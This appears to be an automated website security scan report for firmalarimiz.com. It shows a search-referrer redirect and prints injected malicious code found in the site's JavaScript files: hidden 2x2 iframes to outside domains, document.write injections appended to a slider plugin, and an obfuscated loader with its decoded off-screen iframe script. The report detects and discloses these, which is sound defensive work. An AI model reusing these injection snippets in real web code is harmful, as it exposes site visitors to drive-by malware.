Malicious/Suspicious Redirects
Request:
  URL: http://firmalarimiz.com/ (imitation of visitor from search engine)
  GET / HTTP/1.1
  Host: firmalarimiz.com
  Referer: http://www.google.com/search?q=redirect+check1
Server response:
  HTTP/1.1 302 Found
  Connection: close
  Date: Mon, 01 Sep 2014 17:28:20 GMT
  Location: http://effervescence-records.com/hhwd.html?h=505913
  Server: Apache/2
  Content-Length: 303
  Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files

Request | Server response | Status |
http://firmalarimiz.com/ | 200 OK Content-Length: 81670 Content-Type: text/html | suspicious |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://firmalarimiz.com/easySlider1.5.js | 200 OK Content-Length: 4755 Content-Type: application/javascript | malicious |
http://firmalarimiz.com/lib/jquery.jcarousel.min.js | 200 OK Content-Length: 17146 Content-Type: application/javascript | malicious |
http://firmalarimiz.com/js/changimages.js | 200 OK Content-Length: 5197 Content-Type: application/javascript | malicious |
http://firmalarimiz.com/index.html | 200 OK Content-Length: 81670 Content-Type: text/html | suspicious |
http://firmalarimiz.com/blog/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 01 Sep 2014 17:28:24 GMT Location: http://www.firmalarimiz.com/blog/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.firmalarimiz.com/blog/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.firmalarimiz.com/blog/ | 200 OK Content-Length: 14011 Content-Type: text/html | malicious |
http://www.firmalarimiz.com/blog/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2 | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.firmalarimiz.com/blog/wp-content/themes/ribbons/js/sliding_effect.js?ver=3.2.1 | 200 OK Content-Length: 1068 Content-Type: application/javascript | clean |
http://www.firmalarimiz.com/blog/wp-content/themes/ribbons/js/superfish.js?ver=3.2.1 | 200 OK Content-Length: 3712 Content-Type: application/javascript | clean |
http://firmalarimiz.com//s7.addthis.com/js/250/addthis_widget.js/ | 404 Not Found Content-Length: 425 Content-Type: text/html | clean |
http://firmalarimiz.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://firmalarimiz.com/hakkimizda.html | 200 OK Content-Length: 31575 Content-Type: text/html | suspicious |
http://firmalarimiz.com/sehirler.html | 200 OK Content-Length: 75648 Content-Type: text/html | suspicious |

Findings for the suspicious/malicious entries above

http://firmalarimiz.com/, http://firmalarimiz.com/index.html, http://firmalarimiz.com/hakkimizda.html, http://firmalarimiz.com/sehirler.html (suspicious)
  Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913
  <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913>

http://firmalarimiz.com/easySlider1.5.js (malicious)
  Malicious code - confirmed by antiviruses (see below). Two document.write calls are appended after the legitimate easySlider plugin (the report's listing of the plugin body is truncated):
    (function($) {
      $.fn.easySlider = function(options){
        var defaults = { prevId: 'prevBtn', prevText: 'Previous', nextId: 'nextBtn', nextText: 'Next', controlsShow: true, controlsBefore: '', controlsAfter: '', controlsFade: true, firstId: 'firstBtn', firstText: 'First', firstShow: false, lastId: 'lastBtn', lastText: 'Last', lastShow: false, vertica
        $("a","#"+options.firstId).hide(); }; }); }; })(jQuery);
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html></iframe>');
    document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913></iframe>');
  Antivirus reports:
  Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html
  <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html>
  Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913
  <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913>

http://firmalarimiz.com/lib/jquery.jcarousel.min.js and http://firmalarimiz.com/js/changimages.js (malicious)
  Malicious code - confirmed by antiviruses (see below). Both files carry the same obfuscated injection (the report's listing of the character array is truncated):
    try{1-prototype;}catch(asd){x=2;}
    if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,
  Decoded script:
    function frmAdd() {
      var ifrm = document.createElement('iframe');
      ifrm.style.position='absolute';
      ifrm.style.top='-999em';
      ifrm.style.left='-999em';
      ifrm.src = "http://miamiheattickets.com/http.php";
      ifrm.id = 'frmId';
      document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
    function frmAdd() {
      var ifrm = document.createElement('iframe');
      ifrm.style.position='absolute';
      ifrm.style.top='-999em';
      ifrm.style.left='-999em';
      ifrm.src = "http://miamiheattickets.com/http.php";
      ifrm.id = 'frmId';
      document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
  Antivirus reports:

http://www.firmalarimiz.com/blog/ (malicious)
  Malicious code - confirmed by antiviruses (see below). Same injection as above, with the evaluation call visible after the array (the report's listing of the character array is truncated):
    try{1-prototype;}catch(asd){x=2;}
    if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105
    if(x&&f&&012===10)e(s);
  Decoded script: identical to the frmAdd() script decoded for jquery.jcarousel.min.js and changimages.js above (hidden iframe with src http://miamiheattickets.com/http.php, positioned off-screen at -999em and appended on window.onload).
  Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firmalarimiz.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firmalarimiz.com/
Result: firmalarimiz.com is not infected or malware details are not published yet.